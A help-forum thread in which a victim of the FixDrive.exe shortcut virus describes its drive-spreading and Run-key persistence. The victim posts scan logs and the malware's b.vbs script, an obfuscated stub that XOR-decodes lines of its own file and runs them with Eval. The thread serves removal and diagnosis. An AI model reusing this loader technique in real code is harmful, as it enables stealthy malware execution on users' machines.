FixDrive.exe trojan/virus shortcut virus

Viruses and worms
1

Please help as I cannot clean this virus.
File infects removable storage and mapped drives.

Please see details as to where/how the virus infects a computer/server

Runs wscript.exe

Affected registry

“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WINDOws\CurrentVersion\Run” “HKEY_CURRENT_USER\Software\Microsoft\WINDOws\CurrentVersion\Run”

“%userprofile%\AppData\RoamINg\wINsc32\b.vbs”
“%userprofile%\AppData\RoamINg\wINsc32”

The virus then hides all folders on a mapped drive or removable storage and creates shortcuts of the same folders

All shortcuts link to Fixdrive.exe

2

https://forum.avast.com/index.php?topic=53253.0

3
File infects removable storage and mapped drives.
MCShield will protect / fix > http://www.mcshield.net

Instructions for MCShield is found in the guide Eddy gave link to

4

Once you provide the requested logs, I will help clean you system. Without them, I do not know what to remove / fix.

Please follow the directions for scans in this topic and attach as many of the logs as you can run.
Logs to assist in cleaning malware

FRST.txt, Addition.txt, Malwarebytes Anti-Malware log and aswMBR.txt. Thanks.

5

Herewith the logs as requested, including the vbs script

I also have the virus if you would like me to copy it.

I reinfected this pc as I manually removed the virus.

The virus is is in a file Fixdrive.exe.
After executing the file the following happens
wscript runs
b.vbs is copied to each drive mapped and external.
C:\Users\Administrator\AppData\Roaming\winsc32

and also the SystemInfon folder is created on each mapped and external drive containing the b.vbs script.

ESET does not detect the virus nor does Malware. MCSHIELD detected the virus please see below.

A

b.vbs script

Set filesys1 = CreateObject(“Scripting.FileSystemObject”)

for iiiii = 16 to 17 step 1 : SUGGU = Replace(Split(QJYEK() , VbCrlf)(iiiii) , “REM *?:!”,“”) : SYGYM = SYGYM & SUGGU : Next
AAA = Replace(NetworkFix(SYGYM , 1) , “” , “1”)
N = NetworkFix(“tITRDETppp” , 1)
Eval(N)

Function QJYEK() : Set F = CreateObject(“Scripting.FileSystemObject”) : M = F.OpenTextFile(WScript.ScriptFullName,1).ReadAll : QJYEK = M : End Function

Function NetworkFix(byval Data, byval opennp)
For i = 1 to len(Data) : a= i mod len(opennp): if a = 0 then a = len(opennp) : NetworkFix = NetworkFix & chr(asc(mid(opennp,a,1)) xor asc(mid(Data,i,1)))
Next
End Function

6

Malware

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 8/21/2016
Scan Time: 9:58 AM
Logfile: malware.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.08.21.01
Rootkit Database: v2016.08.15.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Administrator

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 434703
Time Elapsed: 21 min, 20 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 1
PUM.Optional.LowRiskFileTypes, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LowRiskFileTypes, .zip;.exe;.bat;.cmd;.reg;.msi;.vbs,.ps1, Quarantined, [11a4311cacee51e5a18525b12ed56898]

Registry Data: 5
PUM.Optional.WindowsToolDisabled, HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE|DisableConfig, 1, Good: (0), Bad: (1),Replaced,[cfe61a33f7a3c96d5b4d8cecc83ccc34]
PUM.Optional.WindowsToolDisabled, HKLM\SOFTWARE\WOW6432NODE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE|DisableConfig, 1, Good: (0), Bad: (1),Replaced,[6b4a88c5c9d1a88e2c7cf58331d3b34d]
PUM.Optional.HomepageControl, HKU\S-1-5-21-4252029890-4273962779-3039932122-14456\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),Replaced,[73429bb23e5c59dd40b4bdbb25df0ff1]
PUM.Optional.HomepageControl, HKU\S-1-5-21-4252029890-4273962779-3039932122-14598\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),Replaced,[63525eefc6d4112554a013659f65a55b]
PUM.Optional.HomepageControl, HKU\S-1-5-21-4252029890-4273962779-3039932122-50297\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),Replaced,[e4d1ce7f4c4ee65007ed7503ae56d927]

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

MCSHIELD

MCShield ::Anti-Malware Tool:: http://www.mcshield.net/

v 3.0.5.28 / DB: 2016.2.21.1 / Windows 7 <<<

8/21/2016 11:00:21 AM > Drive C: - scan started (System ~200 GB, NTFS HDD )…

C:\desktop.ini - Malware > Deleted. (16.08.21. 11.00 desktop.ini.513806; MD5: 6b1a6a9959ce35fa0df98f8e602bb191)

=> Malicious files : 1/1 deleted.

::::: Scan duration: 1sec ::::::::::::::::::

8/21/2016 11:00:21 AM > Drive D: - scan started (Data ~263 GB, NTFS HDD )…

D:\FixDrive.exe - Suspicious > Renamed. (MD5: c7141b586f3669c9468a4c95c0d4622e)

=> Suspicious files : 1/1 renamed.

::::: Scan duration: 6sec ::::::::::::::::::

7

Addition

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-08-2016
Ran by Administrator (21-08-2016 10:25:19)
Running from C:\Users\Administrator\Downloads
Windows 7 Enterprise Service Pack 1 (X64) (2014-11-24 07:51:57)
Boot Mode: Normal

==================== Accounts: =============================

Administrator (S-1-5-21-3459921781-3051252704-3355898513-500 - Administrator - Enabled) => C:\Users\Administrator
ASPNET (S-1-5-21-3459921781-3051252704-3355898513-1001 - Limited - Enabled)
Guest (S-1-5-21-3459921781-3051252704-3355898513-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET Endpoint Antivirus 5.0 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
AS: ESET Endpoint Antivirus 5.0 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with “Hidden” flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader 10 Corporate Edition (HKLM-x32.…{F1000000-0001-0000-0000-074957833700}) (Version: 10.00.221.7212 - ABBYY)
AbViewer (HKLM-x32.…{605F8C6F-CE62-449C-ADB3-9BD6DFE6EF6A}) (Version: 6.3 - SOFT GOLD Ltd.)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32.…{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.0.0 - Adobe Systems)
Adobe Flash Player 21 ActiveX (HKLM-x32.…{92C34178-B679-4C83-AC33-7EFCE6D36E01}) (Version: 21.0.0.182 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32.…{A7DC9721-4986-4179-BB89-A3E99545584C}) (Version: 21.0.0.182 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.13) MUI (HKLM-x32.…{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32.…{0E3C52E0-B4F1-4D1E-B172-E390813BD9FE}) (Version: 12.1.8.158 - Adobe Systems, Inc)
Apple Application Support (HKLM-x32.…{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Autodesk Navisworks Freedom 2015 - English Language Pack (HKLM.…\Autodesk Navisworks Freedom 2015 - English Language Pack) (Version: 12.0.1109.12 - Autodesk)
Autodesk Navisworks Freedom 2015 - English Language Pack (Version: 12.0.1109.12 - Autodesk) Hidden
Autodesk Navisworks Freedom 2015 (HKLM.…\Autodesk Navisworks Freedom 2015) (Version: 12.0.1109.12 - Autodesk)
Autodesk Navisworks Freedom 2015 (Version: 12.0.1109.12 - Autodesk) Hidden
Autodesk Navisworks Freedom 2015 Deutsch (German) Language Pack (HKLM.…\Autodesk Navisworks Freedom 2015 Deutsch (German) Language Pack) (Version: 12.0.1100.17 - Autodesk)
Autodesk Navisworks Freedom 2015 Deutsch (German) Language Pack (Version: 12.0.1100.17 - Autodesk) Hidden
Bentley V8i (SELECTseries 3) - Autodesk® RealDWG™ 2014 (HKLM-x32.…{23E55F00-CE7A-4860-AF2A-69F3A5F8E54A}) (Version: 08.11.09.459 - Bentley Systems, Incorporated)
Bentley View V8i (SELECTseries 3) 08.11.09.459 (HKLM-x32.…{87D6CF41-5817-4725-8AB2-90E6B20EDE02}) (Version: 08.11.09.459 - Bentley Systems, Incorporated)
Broadcom 802.11 Wireless LAN Adapter (HKLM.…\Broadcom 802.11 Wireless LAN Adapter) (Version: 6.30.223.181 - Broadcom Corporation)
Broadcom Bluetooth Software (HKLM.…{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.5000 - Broadcom Corporation)
Broadcom Wireless Utility (HKLM.…{4CDA59B9-7AD3-4283-9F5C-BC469FF975B6}) (Version: 6.30.223.181 - Broadcom Corporation)
CDB-Notes 2.3 (HKLM-x32.…{24204B47-2AC8-4B90-BAC0-3A472754768D}) (Version: 2.3 - CONTACT Software GmbH)
CDBurnerXP (HKLM.…{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.1.3868 - CDBurnerXP)
CIM DATABASE Desktop 9.8.54 (HKLM-x32.…{0FAC381B-F1D6-4722-B860-8C1B88F68EBD}) (Version: 9.8.54 - CONTACT Software GmbH)
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Citrix Online Plug-in (HKLM-x32.…\CitrixOnlinePluginFull) (Version: 12.1.0.30 - Citrix Systems, Inc.)
Clear-Searchlist (HKLM-x32.…{A8E13425-3F2C-482C-8684-8E86FAED70D9}) (Version: 1.0 - Info AG Clientadministration)
Configuration Manager Client (x32 Version: 4.00.6487.2000 - Microsoft Corporation) Hidden
Cordaware bestinformed (HKLM-x32.…{AF85BC8A-C28E-4606-AE14-C087FE5EBEDD}) (Version: 5.1.03 - Cordaware GmbH Informationslogistik)
Cordaware bestinformed 5.1.0.3 (HKLM-x32.…\Cordaware Infoband_is1) (Version: 5.1.0.3 - Cordaware GmbH)
DHTML Editing Component (HKLM-x32.…{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0001 - Microsoft Corporation)
DisplayLink Core Software (HKLM.…{AAB7AECC-6E0F-4312-9541-2EDF42F370F2}) (Version: 7.3.49122.0 - DisplayLink Corp.)
Engineering Client Viewer 7.0 (HKLM-x32.…\SAP_Engineering Client Viewer 7.0) (Version: - SAP AG)
EN-W7-InfoSlips_ForMe_InfoViewer_42 (HKLM-x32.…{766AD6A5-1177-438A-9560-F23BBCEB44C5}) (Version: 4.0.0.2 - InfoSlips)
ESET Endpoint Antivirus (HKLM.…{FF8AC853-B984-4C9A-937A-1F20FB6AA6B9}) (Version: 5.0.2126.0 - ESET, spol. s r.o.)
Extended Asian Language font pack for Adobe Reader XI (HKLM-x32.…{AC76BA86-7AD7-2530-0000-A00000000049}) (Version: 11.0.09 - Adobe Systems Incorporated)
Google Chrome (HKLM-x32.…\Google Chrome) (Version: 53.0.2785.34 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
HiPath_CA_Hotkey (HKLM-x32.…{02774C11-2EC0-4645-8B09-E1019C162E31}) (Version: 1.00 - Siemens)
HP Connection Manager (HKLM-x32.…{04C23662-CE15-48BE-AF77-7BD9028934E7}) (Version: 4.6.14.1 - Hewlett-Packard Company)
HP ESU for Microsoft Windows 7 (HKLM-x32.…{A6365256-0FBA-4DCD-88CE-D92A4DC9328E}) (Version: 2.0.1.1 - Hewlett-Packard Company)
HP Hotkey Support (HKLM-x32.…{7F7E2060-7212-4A53-9875-55173E4BA3F0}) (Version: 5.0.21.1 - Hewlett-Packard Company)
HP Port Replicator Software Installer (HKLM-x32.…{6313BCDF-1109-4682-A19D-413189817787}) (Version: 1.3.25 - HP)
HP USB Docking Video (HKLM.…{B5C5096E-ABA9-4805-A5BC-4DC5E282B05A}) (Version: 7.3.49122.0 - Hewlett-Packard)
HTML Help Workshop (HKLM-x32.…\HTML Help Workshop) (Version: - )
IBM Cognos TM1 (HKLM-x32.…{AD063608-666F-4B6F-B66E-204661EE9CB2}) (Version: 9.5.20000.11857 - IBM Cognos TM1)
InfoSlips ForMe Viewer (HKLM-x32.…{43C6810F-620E-4B10-8AF3-315B5C85C794}) (Version: 5.2.13 - InfoSlips)
Intel(R) Network Connections Drivers (HKLM.…\PROSet) (Version: 18.1 - Intel)
IZArc 4.1.8 (HKLM-x32.…{97C82B44-D408-4F14-9252-47FC1636D23E}_is1) (Version: 4.1.8 - Ivan Zahariev)
Java 8 Update 77 (64-bit) (HKLM.…{26A24AE4-039D-4CA4-87B4-2F86418077F0}) (Version: 8.0.770.3 - Oracle Corporation)
Lotus Notes 8.5.3 (HKLM-x32.…{E36FB5F6-94FE-47BF-9FBE-6D8CBCFB0269}) (Version: 8.53.11258 - IBM)
Lotus Notes 8.5.3 MUI Pack for G1 (HKLM-x32.…{A68A664E-A638-43AD-9847-5BA379D2FDC8}) (Version: 8.53.11288 - IBM)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32.…\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32.…\Microsoft .NET Framework 1.1 (1033)) (Version: - )
Microsoft .NET Framework 4 Client Profile Language Pack - 日本語 (HKLM.…\Microsoft .NET Framework 4 Client Profile JPN Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended Language Pack - 日本語 (HKLM.…\Microsoft .NET Framework 4 Extended JPN Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5 DEU Language Pack (HKLM.…{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM.…{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Mathematics-Add-In (32 Bit) (HKLM-x32.…{E2C98732-F973-4985-A9C5-DC06178E16EE}) (Version: 2.0.041222.01 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32.…{90120000-00A4-0407-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32.…\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft redistributable runtime DLLs VS2008 SP1(x86) (HKLM-x32.…{A47A9101-6EB5-4314-BDA1-297880FBB908}) (Version: 9.0 - SAP AG)
Microsoft redistributable runtime DLLs VS2010 SP1 (x86) (HKLM-x32.…{2385C070-EC26-4AB9-8718-E605C977C0ED}) (Version: 10.0.40219.1 - SAP)
Microsoft Silverlight (HKLM.…{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM.…{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32.…{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM.…{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM.…{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM.…{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM.…{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32.…{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32.…{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM.…{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32.…{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32.…{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32.…{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32.…{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32.…{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4.0 redistributable (HKLM-x32.…{44D66AD9-AE19-4AFD-BE7E-A1B44C856697}) (Version: 4.0.0.0 - SAP)
Nero-Language-Switch (HKLM-x32.…{BE4CCB15-BD96-4EBA-93CB-4D55E6F5ED45}) (Version: 1.0 - INFO-AG)
OfficeLink 1.12 (HKLM-x32.…{D24F1EC4-456C-4575-B407-B0FA954FBB88}) (Version: 1.12 - CONTACT Software GmbH)
OpenProj (HKLM-x32.…{21BE26DE-96A8-430E-95CC-9028DC6A1B26}) (Version: 1.4.0 - Serena)
OpenText Imaging Windows Viewer 10.0.0 - German Language (HKLM-x32.…{99F50771-0D2E-4089-A191-BFDAB7642DE3}) (Version: 10.0.0 - OPENTEXT CORPORATION)
OpenText Imaging Windows Viewer 10.0.0 (HKLM-x32.…{89A62C6E-9F34-480E-953E-C2CCCE113C86}) (Version: 10.0.0 - OPENTEXT CORPORATION)
PDFCreator (HKLM.…{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.1.2 - pdfforge)
QuickDic (HKLM-x32.…{2F320744-B21C-438C-8BEA-07B156B44FA5}) (Version: 7.3 - Stefan Büdenbender)
QuickTime (HKLM-x32.…{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
SAP Business Explorer (HKLM-x32.…\SAPBI) (Version: 7.40 - SAP SE)
SAP GUI for Windows 7.40 (Patch 4 Hotfix 1) (HKLM-x32.…\SAPGUI) (Version: 7.40 Compilation 1 - SAP)
SAP Netweaver Business Client 5.0 (HKLM-x32.…\SAP_NWBC50) (Version: - SAP SE)
SEAL WD (HKLM-x32.…{55FA4E04-9EEF-443D-83AD-157772588841}) (Version: 1.4.6 - SEAL Systems AG)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32.…{90140000-0011-0000-0000-0000000FF1CE}Office14.PROPLUS{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Striata Reader (HKLM-x32.…{13d868cf-47e9-4b3d-9366-a0c60f82e5aa}) (Version: 2.9-1 - Striata Communication Solutions)
Synaptics Pointing Device Driver (HKLM.…\SynTPDeinstKey) (Version: 17.0.18.8 - Synaptics Incorporated)
Validity Fingerprint Sensor Driver (HKLM.…{F5850B80-27F9-406E-91D3-1329F813BA63}) (Version: 4.5.130.0 - Validity Sensors, Inc.)
vcredist_x86 (HKLM-x32.…{CEC7A786-A9C8-4EF7-BB59-6518E3B3C878}) (Version: 1.0.0 - SAP)
VLC.de media player (HKLM-x32.…\VLC.de media player) (Version: 2.2.1 - VideoLAN)
VLC.de Player (HKLM-x32.…{A431D5E1-A475-4584-AC03-A337DF5525C6}) (Version: 1.0.0 - hxxp://www.vinsvision.com)
Wrapper (HKLM-x32.…{E787DB81-936F-41DA-A345-523516C603F9}) (Version: 2.1 - phat consulting GmbH)
XnView 1.98 (HKLM-x32.…\XnView_is1) (Version: 1.98 - Gougelet Pierre-e)
XnView AddOns (HKLM-x32.…{93DCA3CC-A6CD-44A8-BD2D-6BC4B85201E3}) (Version: 1.00.0000 - Info AG)
XnView Shell Extension 3.2.0 (64bits) (HKLM-x32.…\XnView Shell Extension_is1) (Version: 3.2.0 - Gougelet Pierre-e)

8

Addition cont.

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {510E4FFD-398F-4253-9FBB-AF002459B698} - System32\Tasks\Clear-Searchlist-User => C:\Program Files (x86)\INFO-AG\Clear-Searchlist\20121019-1000-User.exe [2012-11-23] ()
Task: {7292F30F-2B91-4B46-8D3B-9AB6E65BE3A4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-02] (Google Inc.)
Task: {9B411B55-AE4E-4C7A-AF84-E82614B231BF} - System32\Tasks\Clear-Searchlist-Task => C:\Program Files (x86)\INFO-AG\Clear-Searchlist\20121019-1000-Task.exe [2012-11-23] ()
Task: {AF2E39DA-F3E7-451F-8DC7-F692A557C369} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-02] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-11-24 10:06 - 2008-03-20 18:16 - 00094208 _____ () C:\WINDOWS\System32\sealmon_amd64.dll
2013-06-05 12:35 - 2013-06-05 12:35 - 01102336 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\System.Data.SQLite.dll
2016-07-29 08:40 - 2016-07-28 07:28 - 02280264 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.34\libglesv2.dll
2016-07-29 08:40 - 2016-07-28 07:27 - 00107848 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.34\libegl.dll
2013-06-05 12:35 - 2013-06-05 12:35 - 00514570 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\sqlite3.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The “AlternateShell” will be restored.)

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3459921781-3051252704-3355898513-500\Control Panel\Desktop\Wallpaper → C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 10.5.53.1 - 41.79.20.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SNMP-In-UDP] => (Allow) %SystemRoot%\system32\snmp.exe
FirewallRules: [SNMP-Out-UDP] => (Allow) %SystemRoot%\system32\snmp.exe
FirewallRules: [SNMP-In-UDP-NoScope] => (Allow) %SystemRoot%\system32\snmp.exe
FirewallRules: [SNMP-Out-UDP-NoScope] => (Allow) %SystemRoot%\system32\snmp.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{3B786C65-B957-4246-8337-D49E9F254D78}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{36DDB62F-42DE-40B5-B50C-1D077E34F3F1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

==================== Event log errors: =========================

Application errors:

Error: (08/21/2016 08:11:01 AM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/21/2016 12:10:59 AM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 06:05:19 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 04:13:49 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 04:12:09 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 03:11:36 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 01:27:09 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 01:25:49 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/19/2016 08:44:14 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/19/2016 08:02:25 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

==================== Memory info ===========================

Processor: Intel(R) Core™ i5-4210U CPU @ 1.70GHz
Percentage of memory in use: 73%
Total physical RAM: 3513.11 MB
Available physical RAM: 927.2 MB
Total Virtual: 7024.4 MB
Available Virtual: 3658.57 MB

==================== Drives ================================

Drive c: (System) (Fixed) (Total:200 GB) (Free:144.48 GB) NTFS
Drive d: (Data) (Fixed) (Total:262.81 GB) (Free:166.79 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 09D698D1)
Partition 1: (Active) - (Size=300 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=200 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=265.5 GB) - (Type=OF Extended)

==================== End of Addition.txt ============================

9

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-08-2016
Ran by Administrator (administrator) on ZA-ON-P0-7-1094 (21-08-2016 10:24:06)
Running from C:\Users\Administrator\Downloads
Loaded Profiles: Administrator (Available Profiles: Administrator & EBRAHIMM & THABAS)
Platform: Windows 7 Enterprise Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
(Validity Sensors, Inc.) C:\Windows\System32\vcsFPService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\WLTRYSVC.EXE
(Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\BCMWLTRY.EXE
